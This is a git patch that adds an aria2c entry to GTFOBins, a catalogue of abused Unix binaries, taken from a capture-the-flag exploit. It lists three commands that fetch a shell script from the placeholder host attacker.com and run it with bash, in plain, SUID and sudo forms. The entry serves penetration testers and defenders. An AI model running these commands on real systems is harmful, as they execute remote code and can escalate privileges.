From 65b762ca807f6392e8da9ec1a46809f159f623ab Mon Sep 17 00:00:00 2001 From: HugoDelval Date: Fri, 7 Sep 2018 11:53:15 +0200 Subject: [PATCH] Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit --- _gtfobins/aria2c.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 _gtfobins/aria2c.md diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md new file mode 100644 index 0000000..941e371 --- /dev/null +++ b/_gtfobins/aria2c.md @@ -0,0 +1,13 @@ +--- +description: | + Note that the subprocess is immediately sent to the background. + + The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. +functions: + execute-non-interactive: + - code: aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa + suid-enabled: + - code: ./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa + sudo-enabled: + - code: sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa +---